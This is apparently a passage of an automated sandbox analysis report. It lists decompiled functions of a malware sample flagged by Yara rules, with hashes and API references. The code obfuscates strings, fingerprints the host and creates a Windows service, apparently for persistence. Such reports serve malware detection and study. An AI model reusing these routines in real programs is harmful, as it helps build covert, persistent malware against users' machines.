				_v12 = 0x2f79a8a3;
				_v8 = 0x33205105;
				_t107 = E00401A52(0x412780, 0x72fc3a35);
				 *0x4164f0 = LoadLibraryW(_t98);
				L00401B09(_t107);
				_push(0x413660);
				_push(0x3ccd278a);
				return E004012FF( *0x4164f0,  &_v388, 0x60);
			}



































































































                  0x0040892c
                  0x00408936
                  0x00408940
                  0x0040894a
                  0x00408954
                  0x0040895e
                  0x00408968
                  0x00408972
                  0x0040897c
                  0x00408986
                  0x00408990
                  0x0040899a
                  0x004089a4
                  0x004089ae
                  0x004089b8
                  0x004089c2
                  0x004089cc
                  0x004089d6
                  0x004089e0
                  0x004089ea
                  0x004089f4
                  0x004089fe
                  0x00408a08
                  0x00408a12
                  0x00408a1c
                  0x00408a26
                  0x00408a30
                  0x00408a3a
                  0x00408a44
                  0x00408a4e
                  0x00408a58
                  0x00408a62
                  0x00408a6c
                  0x00408a76
                  0x00408a80
                  0x00408a8a
                  0x00408a94
                  0x00408a9e
                  0x00408aa8
                  0x00408ab2
                  0x00408abc
                  0x00408ac6
                  0x00408ad0
                  0x00408ada
                  0x00408ae4
                  0x00408aee
                  0x00408af8
                  0x00408b02
                  0x00408b0c
                  0x00408b16
                  0x00408b20
                  0x00408b2a
                  0x00408b34
                  0x00408b3e
                  0x00408b48
                  0x00408b52
                  0x00408b5c
                  0x00408b66
                  0x00408b70
                  0x00408b7a
                  0x00408b84
                  0x00408b8e
                  0x00408b98
                  0x00408ba2
                  0x00408bac
                  0x00408bb3
                  0x00408bba
                  0x00408bc1
                  0x00408bc8
                  0x00408bcf
                  0x00408bd6
                  0x00408bdd
                  0x00408be4
                  0x00408beb
                  0x00408bf2
                  0x00408bf9
                  0x00408c00
                  0x00408c07
                  0x00408c0e
                  0x00408c15
                  0x00408c21
                  0x00408c2d
                  0x00408c34
                  0x00408c3b
                  0x00408c42
                  0x00408c49
                  0x00408c50
                  0x00408c57
                  0x00408c5e
                  0x00408c65
                  0x00408c6c
                  0x00408c73
                  0x00408c7a
                  0x00408c81
                  0x00408c88
                  0x00408c8f
                  0x00408c9b
                  0x00408ca6
                  0x00408cab
                  0x00408cbc
                  0x00408cc1
                  0x00408cd4

                  APIs
                  • LoadLibraryW.KERNEL32(00000000), ref: 00408C9E
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: =RA$jblg$nZ]c
                  • API String ID: 1029625771-130541845
                  • Opcode ID: 1b1ed6e085e12f066a49fdef08a2a82bb6068c6974effbf6941084d5ca8307fb
                  • Instruction ID: e7cc7c87ab767eb4a20ce2cf539689b4304f70dc4dd1bc1fd0241874581f8c7a
                  • Opcode Fuzzy Hash: 1b1ed6e085e12f066a49fdef08a2a82bb6068c6974effbf6941084d5ca8307fb
                  • Instruction Fuzzy Hash: 9081C6B4C06368DBEB21DF8699857CDBB70FB45704F6086C8C2693B214DB304A86CF99
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040F43E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74COMMON
                  Download Yara Rule
                  C-Code - Quality: 82%
                  			E0040F43E(void* __ebx) {
				long _v8;
				char _v24;
				short _v56;
				void* _t15;
				int _t22;
				char _t24;
				char* _t33;

				_v8 = 0x10;
				if(GetComputerNameW( &_v56,  &_v8) == 0) {
					L12:
					_v24 = 0x58;
					L13:
					_t15 = E004019AB(0x412e30);
					 *0x414664(0x416738, 0x104, _t15,  &_v24,  *0x4164e0);
					return L00401B09(_t15);
				}
				_t22 = WideCharToMultiByte(0, 0x400,  &_v56, 0xffffffff,  &_v24, 0x10, E004019AB(0x412b90), 0);
				L00401B09(_t19);
				if((0 | _t22 > 0x00000000) == 0) {
					goto L12;
				}
				_t33 =  &_v24;
				if(_v24 == 0) {
					goto L13;
				} else {
					goto L3;
				}
				do {
					L3:
					_t24 =  *_t33;
					if(_t24 < 0x30 || _t24 > 0x39) {
						if(_t24 < 0x61 || _t24 > 0x7a) {
							if(_t24 < 0x41 || _t24 > 0x5a) {
								 *_t33 = 0x58;
							}
						}
					}
					_t33 = _t33 + 1;
				} while ( *_t33 != 0);
				goto L13;
			}










                  0x0040f448
                  0x0040f45c
                  0x0040f4c8
                  0x0040f4c8
                  0x0040f4ce
                  0x0040f4d3
                  0x0040f4ef
                  0x0040f503
                  0x0040f503
                  0x0040f481
                  0x0040f490
                  0x0040f498
                  0x00000000
                  0x00000000
                  0x0040f49e
                  0x0040f4a1
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040f4a3
                  0x0040f4a3
                  0x0040f4a3
                  0x0040f4a7
                  0x0040f4af
                  0x0040f4b7
                  0x0040f4bd
                  0x0040f4bd
                  0x0040f4b7
                  0x0040f4af
                  0x0040f4c0
                  0x0040f4c1
                  0x00000000

                  APIs
                  • GetComputerNameW.KERNEL32(?,0040F111), ref: 0040F454
                  • WideCharToMultiByte.KERNEL32(00000000,00000400,?,000000FF,?,00000010,00000000,00000000,00000104,?,?,?,?,?,0040F956,00000102), ref: 0040F481
                  • _snprintf.NTDLL ref: 0040F4EF
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharComputerMultiNameWide_snprintf
                  • String ID: X
                  • API String ID: 4080658169-3081909835
                  • Opcode ID: 2bc150695e65d2aa25e26b27c57a638bc2971cc0613965bb47d8cfdb1b1427d9
                  • Instruction ID: dbbf294783a5ce5e9b0548ade1bddf9532166b7a22268ff85b9ccd314504079c
                  • Opcode Fuzzy Hash: 2bc150695e65d2aa25e26b27c57a638bc2971cc0613965bb47d8cfdb1b1427d9
                  • Instruction Fuzzy Hash: D5115B719011086ADB30DA699D01BEB37AC9B11708F50113BEC45F12D1E77C8A0A83EE
                  Uniqueness

                  Uniqueness Score: 0.17%

                  Function 0040F2EE, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71fileUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 37%
                  			E0040F2EE(void* __eflags) {
				char _v524;
				char _v1044;
				short _v1564;
				char* _t17;
				void* _t45;

				_t42 = E00401A52(0x412a00, 0x4bf67e71);
				E0040F190( &_v1044, _t9);
				L00401B09(_t42);
				_push( &_v524);
				_push(0);
				_push(0);
				if( *0x415f4c == 0) {
					 *0x414c14(0, 0x1c);
					_t43 = E00401A52(0x412df0, 0x4bf67e71);
					_t17 =  &_v524;
					 *0x4143a4(_t17, 0x104, _t15, _t17,  &_v1044);
					_t45 = _t45 + 0x14;
					L00401B09(_t43);
				} else {
					 *0x414c14(0, 0x29);
				}
				_t44 = E00401A52(0x412bb0, 0x4bf67e71);
				 *0x4143a4( &_v1564, 0x104, _t20,  &_v524,  &_v1044);
				L00401B09(_t44);
				return DeleteFileW( &_v1564);
			}








                  0x0040f30b
                  0x0040f315
                  0x0040f31c
                  0x0040f32c
                  0x0040f32f
                  0x0040f330
                  0x0040f337
                  0x0040f347
                  0x0040f359
                  0x0040f362
                  0x0040f36c
                  0x0040f372
                  0x0040f377
                  0x0040f339
                  0x0040f33c
                  0x0040f33c
                  0x0040f388
                  0x0040f3a1
                  0x0040f3ac
                  0x0040f3c4

                  APIs
                    • Part of subcall function 0040F190: lstrlenW.KERNEL32(00000000,00000000,00000000,00000104,?,?,0040F111), ref: 0040F1A1
                  • _snwprintf.NTDLL ref: 0040F36C
                  • _snwprintf.NTDLL ref: 0040F3A1
                  • DeleteFileW.KERNEL32(?), ref: 0040F3B8
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: _snwprintf$DeleteFilelstrlen
                  • String ID: g8Cw
                  • API String ID: 3875729096-3103284439
                  • Opcode ID: e235a4feeaa79c33ada0ee46943aba6416484cecfd0d8ac7cae2eab99280496f
                  • Instruction ID: 657008bbddd63c106de985fdb09df341ec56487ec0cf543515cc0156050913b4
                  • Opcode Fuzzy Hash: e235a4feeaa79c33ada0ee46943aba6416484cecfd0d8ac7cae2eab99280496f
                  • Instruction Fuzzy Hash: 5C11B7B1A001189BC720E7619C449EB726DDB84355F0440BBF90AE3291EE385E858BED
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040284F, Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 176UNIQUE
                  Download Yara Rule
                  C-Code - Quality: 95%
                  			E0040284F(intOrPtr* __ecx) {
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t89;
				void* _t90;
				signed int _t92;
				signed int _t93;
				signed int _t101;
				signed int _t126;
				int* _t128;
				char _t133;
				signed int _t135;
				signed int _t136;
				void* _t137;
				intOrPtr _t139;
				signed int _t141;
				void* _t142;
				signed int _t145;
				intOrPtr* _t148;
				signed int _t152;
				int _t153;
				intOrPtr _t154;
				int _t155;
				void* _t156;

				_t148 = __ecx;
				_t142 = 8;
				if(__ecx == 0) {
					L22:
					_push(0xfffffffe);
					L23:
					_pop(_t89);
					return _t89;
				}
				_t128 =  *((intOrPtr*)(__ecx + 0x1c));
				if(_t128 == 0) {
					goto L22;
				}
				_t90 = 9;
				_t143 =  >  ? _t90 : _t142;
				_v20 =  *((intOrPtr*)(__ecx + 4));
				_t92 =  *(_t128 + 0x2af8);
				_v24 =  >  ? _t90 : _t142;
				 *(_t128 + 0x2af8) = 0;
				if( *(_t128 + 0xab04) >= 0) {
					 *(_t128 + 0x2afc) =  *(_t128 + 0x2afc) | 1;
					__eflags = _t92;
					if(_t92 == 0) {
						_t93 =  *(_t128 + 0x2af4);
						__eflags = _t93;
						if(_t93 == 0) {
							while(1) {
								_t131 =  *(_t128 + 0x2af0);
								_v8 =  *((intOrPtr*)(_t148 + 4));
								_v12 = 0x8000 -  *(_t128 + 0x2af0);
								_t101 = E00404AD4(_t128,  *_t148,  &_v8, _t128 + 0x2b04, _t128 + 0x2b04 + _t131,  &_v12, _t143);
								_t133 = _v8;
								 *(_t128 + 0xab04) = _t101;
								 *_t148 =  *_t148 + _t133;
								 *((intOrPtr*)(_t148 + 4)) =  *((intOrPtr*)(_t148 + 4)) - _t133;
								 *((intOrPtr*)(_t148 + 8)) =  *((intOrPtr*)(_t148 + 8)) + _t133;
								 *((intOrPtr*)(_t148 + 0x30)) =  *((intOrPtr*)(_t128 + 0x1c));
								_t135 = _v12;
								 *(_t128 + 0x2af4) = _t135;
								_t152 =  *(_t148 + 0x10);
								__eflags = _t135 - _t152;
								_v16 = _t101;
								_t153 =  <  ? _t135 : _t152;
								memcpy( *(_t148 + 0xc),  *(_t128 + 0x2af0) + 0x2b04 + _t128, _t153);
								 *(_t148 + 0xc) =  *(_t148 + 0xc) + _t153;
								_t156 = _t156 + 0x20;
								 *(_t148 + 0x10) =  *(_t148 + 0x10) - _t153;
								 *((intOrPtr*)(_t148 + 0x14)) =  *((intOrPtr*)(_t148 + 0x14)) + _t153;
								 *(_t128 + 0x2af4) =  *(_t128 + 0x2af4) - _t153;
								_t136 = _v16;
								_t145 =  *(_t128 + 0x2af4);
								 *(_t128 + 0x2af0) =  *(_t128 + 0x2af0) + _t153 & 0x00007fff;
								__eflags = _t136;
								if(_t136 < 0) {
									goto L3;
								}
								__eflags = _t136 - 1;
								if(_t136 != 1) {
									L18:
									__eflags = _t136;
									if(_t136 == 0) {
										__eflags = _t145;
										_t137 = 0xfffffffb;
										_t111 =  !=  ? _t137 : 1;
										return  !=  ? _t137 : 1;
									}
									__eflags =  *(_t148 + 0x10);
									if( *(_t148 + 0x10) == 0) {
										L8:
										_push(0xfffffffb);
										goto L23;
									}
									_t143 = _v24;
									continue;
								}
								__eflags = _v20;
								if(_v20 == 0) {
									goto L8;
								}
								goto L18;
							}
							goto L3;
						}
						_t154 =  *((intOrPtr*)(__ecx + 0x10));
						__eflags = _t93 - _t154;
						_t155 =  <  ? _t93 : _t154;
						memcpy( *(__ecx + 0xc),  *(_t128 + 0x2af0) + 0x2b04 + _t128, _t155);
						 *(_t148 + 0xc) =  *(_t148 + 0xc) + _t155;
						 *(_t148 + 0x10) =  *(_t148 + 0x10) - _t155;
						 *((intOrPtr*)(_t148 + 0x14)) =  *((intOrPtr*)(_t148 + 0x14)) + _t155;
						 *(_t128 + 0x2af4) =  *(_t128 + 0x2af4) - _t155;
						__eflags =  *(_t128 + 0xab04);
						 *(_t128 + 0x2af0) =  *(_t128 + 0x2af0) + _t155 & 0x00007fff;
						if( *(_t128 + 0xab04) != 0) {
							L14:
							return 0;
						}
						__eflags =  *(_t128 + 0x2af4);
						if( *(_t128 + 0x2af4) != 0) {
							goto L14;
						}
						return 1;
					}
					_v8 =  *((intOrPtr*)(__ecx + 4));
					_v12 =  *((intOrPtr*)(__ecx + 0x10));
					_t126 = E00404AD4(_t128,  *__ecx,  &_v8,  *(__ecx + 0xc),  *(__ecx + 0xc),  &_v12, _t143 | 0x00000004);
					_t139 = _v8;
					 *(_t128 + 0xab04) = _t126;
					 *__ecx =  *__ecx + _t139;
					 *((intOrPtr*)(__ecx + 4)) =  *((intOrPtr*)(__ecx + 4)) - _t139;
					 *((intOrPtr*)(__ecx + 8)) =  *((intOrPtr*)(__ecx + 8)) + _t139;
					 *((intOrPtr*)(__ecx + 0x30)) =  *((intOrPtr*)(_t128 + 0x1c));
					_t141 = _v12;
					 *(__ecx + 0xc) =  *(__ecx + 0xc) + _t141;
					 *((intOrPtr*)(__ecx + 0x10)) =  *((intOrPtr*)(__ecx + 0x10)) - _t141;
					 *((intOrPtr*)(__ecx + 0x14)) =  *((intOrPtr*)(__ecx + 0x14)) + _t141;
					__eflags = _t126;
					if(__eflags < 0) {
						goto L3;
					}
					if(__eflags == 0) {
						return 1;
					}
					_t34 = _t128 + 0xab04;
					 *_t34 =  *(_t128 + 0xab04) | 0xffffffff;
					__eflags =  *_t34;
					goto L8;
				}
				L3:
				_push(0xfffffffd);
				goto L23;
			}





























                  0x00402858
                  0x0040285c
                  0x0040285f
                  0x00402a69
                  0x00402a69
                  0x00402a6b
                  0x00402a6b
                  0x00000000
                  0x00402a6b
                  0x00402865
                  0x0040286a
                  0x00000000
                  0x00000000
                  0x0040287a
                  0x0040287b
                  0x00402881
                  0x00402884
                  0x0040288a
                  0x0040288d
                  0x00402899
                  0x004028a5
                  0x004028ab
                  0x004028ad
                  0x00402917
                  0x0040291d
                  0x0040291f
                  0x00402987
                  0x00402990
                  0x00402996
                  0x004029a0
                  0x004029ba
                  0x004029bf
                  0x004029c2
                  0x004029c8
                  0x004029ca
                  0x004029cd
                  0x004029d3
                  0x004029d6
                  0x004029d9
                  0x004029df
                  0x004029e2
                  0x004029e4
                  0x004029ed
                  0x004029fc
                  0x00402a02
                  0x00402a05
                  0x00402a08
                  0x00402a0b
                  0x00402a14
                  0x00402a1c
                  0x00402a24
                  0x00402a2a
                  0x00402a30
                  0x00402a32
                  0x00000000
                  0x00000000
                  0x00402a3b
                  0x00402a3d
                  0x00402a49
                  0x00402a49
                  0x00402a4b
                  0x00402a61
                  0x00402a63
                  0x00402a64
                  0x00000000
                  0x00402a64
                  0x00402a4d
                  0x00402a51
                  0x00402909
                  0x00402909
                  0x00000000
                  0x00402909
                  0x00402a57
                  0x00000000
                  0x00402a57
                  0x00402a3f
                  0x00402a43
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00402a43
                  0x00000000
                  0x00402987
                  0x00402921
                  0x00402924
                  0x00402926
                  0x0040293b
                  0x00402941
                  0x00402947
                  0x0040294a
                  0x00402953
                  0x00402960
                  0x00402967
                  0x0040296d
                  0x00402980
                  0x00000000
                  0x00402980
                  0x0040296f
                  0x00402976
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040297a
                  0x004028b5
                  0x004028c0
                  0x004028d1
                  0x004028d6
                  0x004028dc
                  0x004028e2
                  0x004028e4
                  0x004028e7
                  0x004028ed
                  0x004028f0
                  0x004028f3
                  0x004028f6
                  0x004028f9
                  0x004028fc
                  0x004028fe
                  0x00000000
                  0x00000000
                  0x00402900
                  0x00000000
                  0x00402910
                  0x00402902
                  0x00402902
                  0x00402902
                  0x00000000
                  0x00402902
                  0x0040289b
                  0x0040289b
                  0x00000000

                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 0HCw$Ab@
                  • API String ID: 0-707421244
                  • Opcode ID: 33f034056c3a3427ec488e59f39741281436f7c45068a44fc4d7b3f08e725971
                  • Instruction ID: 085e4857d5f96ebe99bd6dbc6265157c6608e9d95e27a4949ae474babd6914cb
                  • Opcode Fuzzy Hash: 33f034056c3a3427ec488e59f39741281436f7c45068a44fc4d7b3f08e725971
                  • Instruction Fuzzy Hash: 7A618171B00606AFCB58CF69CA88996B3B4FF04314F14827ADC19DB6C5DB78A950CF95
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 00405FA4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97UNIQUE
                  Download Yara Rule
                  C-Code - Quality: 91%
                  			E00405FA4(void* __ecx, intOrPtr* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr* _v8;
				void* _t28;
				void* _t44;
				void* _t45;
				intOrPtr _t46;
				signed int _t56;
				void* _t78;
				void* _t84;
				void* _t86;
				intOrPtr _t89;
				intOrPtr _t91;
				char* _t92;
				void* _t93;

				_t46 = _a4;
				_v8 = __edx;
				E00401503(_t46, 0x808);
				E00405F15(_t46, E00401A52(0x4120d0, 0x680f9b3));
				L00401B09(_t25);
				_t28 = E00401A52(0x4122a0, 0x680f9b3);
				_t3 = _t46 + 0x400; // 0x4065cd
				 *0x4143a4(_t3, 0x200, _t28, __ecx, _t46, _t78, _t86, _t45, __ecx);
				L00401B09(_t28);
				_t80 = _v8;
				_t56 = 3;
				_t89 = E004014F2(( *((intOrPtr*)(_v8 + 4)) + 2) / _t56 << 2);
				_v8 = _t89;
				if(_t89 != 0) {
					_a4 = E0040156A( *_t80,  *((intOrPtr*)(_t80 + 4)), _t89);
					_t84 = (GetTickCount() & 0x0000000f) + 4;
					_t14 = E0040162B(_t89, _a4) + 1; // 0x1
					_t91 = E004014F2(_t14 + _t84);
					 *((intOrPtr*)(_t46 + 0x800)) = _t91;
					if(_t91 == 0) {
						_t85 = _v8;
					} else {
						E00401E27(_t91, _t84);
						_t92 = _t91 + _t84;
						_t85 = _v8;
						 *_t92 = 0x3d;
						_t93 = _t92 + 1;
						_t44 = E00401680(_v8, _a4, _t93);
						_t18 = _t46 + 0x800; // 0xc885c70e
						 *((intOrPtr*)(_t46 + 0x804)) = _t93 + _t44 -  *_t18;
					}
					E00401532(_t85);
				}
				return 0 |  *((intOrPtr*)(_t46 + 0x800)) != 0x00000000;
			}
















                  0x00405fa9
                  0x00405fae
                  0x00405fba
                  0x00405fd4
                  0x00405fdb
                  0x00405fea
                  0x00405ff3
                  0x00406000
                  0x0040600b
                  0x00406010
                  0x00406017
                  0x0040602a
                  0x0040602c
                  0x00406031
                  0x0040603f
                  0x00406052
                  0x0040605a
                  0x00406064
                  0x00406066
                  0x0040606e
                  0x0040609e
                  0x00406070
                  0x00406074
                  0x0040607c
                  0x0040607e
                  0x00406083
                  0x00406086
                  0x00406088
                  0x0040608f
                  0x00406096
                  0x00406096
                  0x004060a3
                  0x004060a3
                  0x004060b9

                  APIs
                    • Part of subcall function 00405F15: lstrlenW.KERNEL32(00000000,?,00000000,004061CD,?,004061CD,?), ref: 00405F26
                    • Part of subcall function 00405F15: GetTickCount.KERNEL32(?,004061CD,?), ref: 00405F2F
                  • _snwprintf.NTDLL ref: 00406000
                    • Part of subcall function 004014F2: GetProcessHeap.KERNEL32(00000008,004129A0,00401A84,?,00000000,00000104,?,?,0040F0B9), ref: 004014F5
                    • Part of subcall function 004014F2: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 004014FC
                  • GetTickCount.KERNEL32 ref: 00406042
                    • Part of subcall function 00401E27: GetTickCount.KERNEL32(-00000004,00000000,004061CD), ref: 00401E39
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: CountTick$Heap$AllocateProcess_snwprintflstrlen
                  • String ID: g8Cw
                  • API String ID: 459781281-3103284439
                  • Opcode ID: 76b03827719990e30b0c101892e01b597c257d1c543933898f8cee2b7d7ceefb
                  • Instruction ID: 00cdad927da0c0ef8d73a3e5ef527bbb7d9062bc05b5f9e08202af6a880e88a8
                  • Opcode Fuzzy Hash: 76b03827719990e30b0c101892e01b597c257d1c543933898f8cee2b7d7ceefb
                  • Instruction Fuzzy Hash: BC31B531B000109BCB14EF658841A9E7796AFC4754F29817EED0AAF3D6DE789D0187D8
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040F7A0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84UNIQUE
                  Download Yara Rule
                  C-Code - Quality: 23%
                  			E0040F7A0() {
				char _v8;
				char _v528;
				intOrPtr _t19;
				void* _t24;
				char _t32;
				void* _t33;
				void* _t35;

				_t32 = 0;
				_v8 = 0;
				_t24 =  *0x412ef4(0, 0, 0xf003f);
				if(_t24 != 0) {
					_t34 = E00401A52(0x4129d0, 0x4bf67e71);
					 *0x4143a4( &_v528, 0x104, _t9, 0x416840, _t33);
					L00401B09(_t34);
					_t35 =  *0x4134c8(_t24, 0x416530, 0x416530, 0x12, 0x10, 2, 0,  &_v528, 0, 0, 0, 0, 0);
					if(_t35 != 0) {
						if(E0040F504(_t24,  &_v8) != 0) {
							 *0x41353c(_t35, 1, _v8);
							E00401532(_v8);
						}
					} else {
						_t35 =  *0x413594(_t24, 0x416530, 0x10);
					}
					if(_t35 != 0) {
						_t19 =  *0x41315c(_t35, _t32, _t32);
						_t32 = _t19;
						 *0x4135a4(_t35);
					}
					E0040F6D0(_t24);
					 *0x4135a4(_t24);
				}
				return _t32;
			}










                  0x0040f7ab
                  0x0040f7b4
                  0x0040f7bd
                  0x0040f7c1
                  0x0040f7d7
                  0x0040f7eb
                  0x0040f7f6
                  0x0040f81c
                  0x0040f820
                  0x0040f840
                  0x0040f848
                  0x0040f851
                  0x0040f851
                  0x0040f822
                  0x0040f830
                  0x0040f830
                  0x0040f858
                  0x0040f85d
                  0x0040f864
                  0x0040f866
                  0x0040f866
                  0x0040f86e
                  0x0040f874
                  0x0040f87a
                  0x0040f882

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: _snwprintf
                  • String ID: 0eA$g8Cw
                  • API String ID: 3988819677-1352154256
                  • Opcode ID: 8788b05d66e6191db14083dcb274117b82c263dd676d547b19645e5bf22e022a
                  • Instruction ID: eaef89646e70cf25437eea923daa7feb7edf07035885503fb66571f4c5335789
                  • Opcode Fuzzy Hash: 8788b05d66e6191db14083dcb274117b82c263dd676d547b19645e5bf22e022a
                  • Instruction Fuzzy Hash: EF21F3726013147BD7206B665D49FEB3A6D9B85B01F00417ABD06F72D2DAB88E0496AC
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040FC67, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46synchronizationUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0040FC67() {
				void* _t9;
				int _t10;
				void* _t15;
				intOrPtr* _t21;
				intOrPtr* _t22;

				_t22 =  *0x4164e4;
				_t21 = 0x4164e4;
				if(_t22 == 0) {
					return _t9;
				}
				do {
					_t15 = 0;
					if( *((intOrPtr*)(_t22 + 8)) == 1 ||  *((intOrPtr*)(_t22 + 8)) == 2) {
						_t15 = 1;
					}
					if( *((intOrPtr*)(_t22 + 8)) == 3) {
						_t10 = WaitForSingleObject( *(_t22 + 0x14), 0);
						if(_t10 == 0) {
							 *((intOrPtr*)(_t22 + 0x10))( *((intOrPtr*)(_t22 + 0xc)), _t10, _t10);
							E0040192A( *((intOrPtr*)(_t22 + 0xc)));
							_t10 = CloseHandle( *(_t22 + 0x14));
							_t15 = 1;
						}
					}
					if(_t15 == 0) {
						_t21 = _t22;
					} else {
						 *_t21 =  *_t22;
						_t10 = E00401532(_t22);
					}
					_t22 =  *_t21;
				} while (_t22 != 0);
				return _t10;
			}








                  0x0040fc68
                  0x0040fc6f
                  0x0040fc76
                  0x0040fcd7
                  0x0040fcd7
                  0x0040fc79
                  0x0040fc79
                  0x0040fc7f
                  0x0040fc89
                  0x0040fc89
                  0x0040fc8e
                  0x0040fc95
                  0x0040fc9d
                  0x0040fca4
                  0x0040fcaa
                  0x0040fcb2
                  0x0040fcba
                  0x0040fcba
                  0x0040fc9d
                  0x0040fcbd
                  0x0040fccc
                  0x0040fcbf
                  0x0040fcc3
                  0x0040fcc5
                  0x0040fcc5
                  0x0040fcce
                  0x0040fcd0
                  0x00000000

                  APIs
                  • WaitForSingleObject.KERNEL32(?,00000000), ref: 0040FC95
                  • CloseHandle.KERNEL32(?), ref: 0040FCB2
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseHandleObjectSingleWait
                  • String ID: dA
                  • API String ID: 528846559-3833285433
                  • Opcode ID: 3fd25aa55a6274f4f7e9cc92725da2f21c8c3f2147d4135f88846fc5401ef8fd
                  • Instruction ID: 9783dac627fe2aad0d055cd04b4053eec809d95b972e8a9730baec20d1199667
                  • Opcode Fuzzy Hash: 3fd25aa55a6274f4f7e9cc92725da2f21c8c3f2147d4135f88846fc5401ef8fd
                  • Instruction Fuzzy Hash: E601B1322047118FE7304F65D999923B3A8BF44715711893BEC4363BA0C334AC48C648
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040C5A7, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33UNIQUE
                  Download Yara Rule
                  C-Code - Quality: 68%
                  			E0040C5A7(void* __eflags) {
				short _v132;
				void* _t5;
				void* _t11;

				_t5 = E00401A52(0x4127e0, 0x72fc3a35);
				 *0x4143a4( &_v132, 0x40, _t5,  *0x415488);
				L00401B09(_t5);
				_t11 = CreateEventW(0, 0, 0,  &_v132);
				 *0x414e6c = _t11;
				return 0 | _t11 != 0x00000000;
			}






                  0x0040c5bb
                  0x0040c5cf
                  0x0040c5da
                  0x0040c5e8
                  0x0040c5f0
                  0x0040c600

                  APIs
                  • _snwprintf.NTDLL ref: 0040C5CF
                  • CreateEventW.KERNEL32(00000000,00000000,00000000,?), ref: 0040C5E8
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateEvent_snwprintf
                  • String ID: g8Cw
                  • API String ID: 3138640819-3103284439
                  • Opcode ID: bf91c9978e232df667675dfab0b91fafffa405702bdcbacc6dac383674977833
                  • Instruction ID: 966a77967990d1c2b3e105985163cbd3e7ea594235671e381eb49e2a5e3bd5e9
                  • Opcode Fuzzy Hash: bf91c9978e232df667675dfab0b91fafffa405702bdcbacc6dac383674977833
                  • Instruction Fuzzy Hash: BDF0A7717001146BD701ABA96C05AFB36ACEB44304F00803EF905D7190EE34D81087DD
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040C54E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31synchronizationUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 68%
                  			E0040C54E(void* __eflags) {
				short _v132;
				void* _t5;
				void* _t10;

				_t5 = E00401A52(0x412340, 0x72fc3a35);
				 *0x4143a4( &_v132, 0x40, _t5,  *0x415488);
				L00401B09(_t5);
				_t10 = CreateMutexW(0, 0,  &_v132);
				 *0x41365c = _t10;
				return 0 | _t10 != 0x00000000;
			}






                  0x0040c562
                  0x0040c576
                  0x0040c581
                  0x0040c58e
                  0x0040c596
                  0x0040c5a6

                  APIs
                  • _snwprintf.NTDLL ref: 0040C576
